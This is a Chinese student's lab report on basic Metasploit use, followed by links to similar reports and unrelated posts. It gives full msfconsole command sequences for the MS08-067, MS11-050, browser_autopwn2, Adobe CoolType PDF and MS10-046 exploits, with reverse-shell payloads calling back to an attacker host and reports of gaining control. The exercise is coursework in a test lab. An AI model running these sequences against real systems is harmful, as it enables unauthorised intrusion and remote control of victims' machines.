Exp5:MSF基础应用

一、基础问题回答

(1)用自己的话解释什么是 exploit , payload , encode.

exploit: 设相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。

payload: 简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务。

encode: 针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,但是不改变payload为我们所用的特征,但能对payload进行加工。

二、实践过程

  • 1.Windows服务渗透攻击——MS08-067安全漏洞

    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

      msf > use exploit/windows/smb/ms08_067_netapi

      msf exploit(ms08_067_netapi) > show payloads

      msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连

      msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161 //攻击机ip

      msf exploit(ms08_067_netapi) > set LPORT 5213 //攻击端口

      msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161 //靶机ip,特定漏洞端口已经固定

      msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高

      msf exploit(ms08_067_netapi) > exploit //攻击

    • 此时需要关闭靶机的防火墙,不然会出现ConnectionTimeOut的失败;

    • 攻击成功后的结果:

  • 2.浏览器渗透攻击——MS11-050

    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    msf > use windows/browser/ms11_050_mshtml_cobjectelement

    msf exploit(ms11_050_cobjectelement) > set payload
    windows/meterpreter/reverse_http //http反向回连

    msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(ms11_050_cobjectelement) > set LPORT 5213 //攻击端口固定

    msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm //统一资源标识符路径设置

    msf exploit(ms11_050_cobjectelement) > exploit

  • 测试无法成功,总是会出现IE浏览器的错误,我觉得问题是出在浏览器版本不对,不适合那个漏洞,既然如此,那就换个漏洞呗,下面使用一种自动根据浏览器版本选择合适的漏洞进行攻击的方法
    • ** 实施browser_autopwn模块 **

      • 现在攻击机里进入msfconsole,然后分别输入

        use auxiliary/server/browser_autopwn2

        set SRVHOST 192.168.43.161

        set URIPATH auto

        show options

      • 开始攻击,此时可以看到msf在不停的尝试不同的payload
      • 尝试成功,输出了可被访问的URL http://192.168.43.161:8080/auto并启动服务器;

      • 在靶机浏览器上输入URL后,浏览器跳转到 http://192.168.43.161:8080/auto/FaOGsp

      • 回头看一下kali机,发现回连成功了,输入session -i 2获取对话,此时,已经获得了靶机的控制权。

  • 3.针对Adobe Reader软件的渗透攻击——adobe_toolbutton

    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

    msf > use windows/fileformat/adobe_cooltype_sing

    msf exploit(adobe_cooltype_sing) > set payload
    windows/meterpreter/reverse_tcp //tcp反向回连

    msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(adobe_cooltype_sing) > set LPORT 5213 //攻击端口

    msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf //设置生成pdf文件的名字

    msf exploit(adobe_cooltype_sing) > exploit //攻击

    • 将生成的pdf文件拷贝到靶机上。

    • 在kali上输入back退出当前模块,进入监听模块,输入以下命令:

    msf > use exploit/multi/handler //进入监听模块

    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接

    msf exploit(handler) > set LHOST 192.168.43.161 //攻击机ip

    msf exploit(handler) > set LPORT 5213 //攻击端口固定

    msf exploit(handler) > exploit

    • 在靶机上打开5213lzm.pdf文件:
    • 攻击机显示攻击成功:
  • 4.快捷方式图标漏洞——MS10-046
    • 在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

      msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

      msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.43.48 //攻击机ip

      msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp //tcp反向回连

      msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.43.48 //攻击机ip

      msf exploit(ms10_046_shortcut_icon_dllloader) > exploit //攻击

      • 此时弹出一个攻击者IP的目录,其中有一个“快捷方式”的图标:
      • 对于已建立好了会话,通过命令sessions查看,并选择sessions -i 1,获得靶机控制权。

        (PS)本次试验时间上跨度有点大,没能连贯的做完,第四个项任务是在ciscn结束之后做的,而此时的kali机已被折腾崩了,所以考了别人的虚拟机,继续做完了,这里的IP不是之前那个。

三、实践总结及体会

本次试验给我最深的感触就是msf的强大,活用msf真的能够在渗透测试或者以攻击为目的的行为给予很大帮助,同时,为了防止被攻击,还是及时更新系统,填补漏洞,因为有一双研眼镜正在窥探你的笔记本。

Exp5:MSF基础应用的更多相关文章

  1. 2018-2019 20165232 Exp5 MSF基础应用

    2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

  2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  3. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  4. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

    - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

  5. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  6. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

  7. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  9. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  10. 2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用

    2018-2019-2 20165336<网络攻防技术>Exp5 MSF基础应用 一.攻击实例 主动攻击的实践 ms08_067(成功) payload/generic/shell_rev ...

随机推荐

  1. 用windows浏览器打开Linux的Jupyter notebook开发、调试示例

    1.场景,在windows浏览器中打开Linux环境下的jupyter notebook.Jupyter notebook开启远程服务,Spark.python计算环境在Linux服务器中,而工作环境 ...

  2. C#取得控制台应用程序的根目录方法 判断文件夹是否存在,不存在就创建

    取得控制台应用程序的根目录方法1:Environment.CurrentDirectory 取得或设置当前工作目录的完整限定路径2:AppDomain.CurrentDomain.BaseDirect ...

  3. springboot 1.3.5升级1.5.9后 默认使用tomcat 8.5版本 get请求报400 异常信息为 The valid characters are defined in RFC 7230 and RFC 3986

    1.springboot 1.3.5升级1.5.9后 默认使用tomcat 8.5版本而之前用的是tomcat7    get请求报400 异常信息为 The valid characters are ...

  4. python实现简单的负载均衡

    提到分发请求,相信大多数人首先会想到Nginx,Nginx作为一种多功能服务器,不仅提供了反向代理隐藏主机ip的能力,还拥有简单的缓存加速功能.当然Nginx最强大的功能还是分发请求,不仅提供了哈希, ...

  5. Fusion 360教程合集27部

    Fusion 360教程合集27部 教程格式:MP4和flv 等格式 使用版本:教程不是一年出的教程,各个版本都有 (教程软件为英文版) 教程格式:MP4.FLV等视频格式 清晰度:可以看清软件上的文 ...

  6. 2016年,谁是最受欢迎的 Java EE 服务器?

    [编者按]本文作者为性能监控工具 Plumbr 创始人 Nikita Salnikov-tarnovski,主要介绍2016年度最广为使用的 Java EE 容器及其排名变化情况.本文系国内 ITOM ...

  7. 从专用磁盘创建 Windows VM

    通过使用 Powershell 将专用托管磁盘附加为 OS 磁盘来创建新 VM. 专用磁盘是保留原始 VM 中的用户帐户.应用程序和其他状态数据的现有 VM 中虚拟硬盘 (VHD) 的副本. 使用专用 ...

  8. 人工智能——Singleton模式

    上次在状态模式中的设计有一个严重的问题,就是如下: voidCTroll::ChageState(CState* pNewState) {        deletem_pCurrentState; ...

  9. Custom Voice 操作步骤

    首先,准备数据 1.Unicode格式的Transcript 2wav格式语音数据,并打包 好,现在POSTMAN进行api测试. 先拿着订阅密钥(Subscription Key)获取令牌(Toke ...

  10. 《Effective C++》 目录:

    转自:http://blog.csdn.net/KangRoger/article/details/44706403 目录 条款1:视C++为一个语言联邦 条款2:尽量以const.enum.inli ...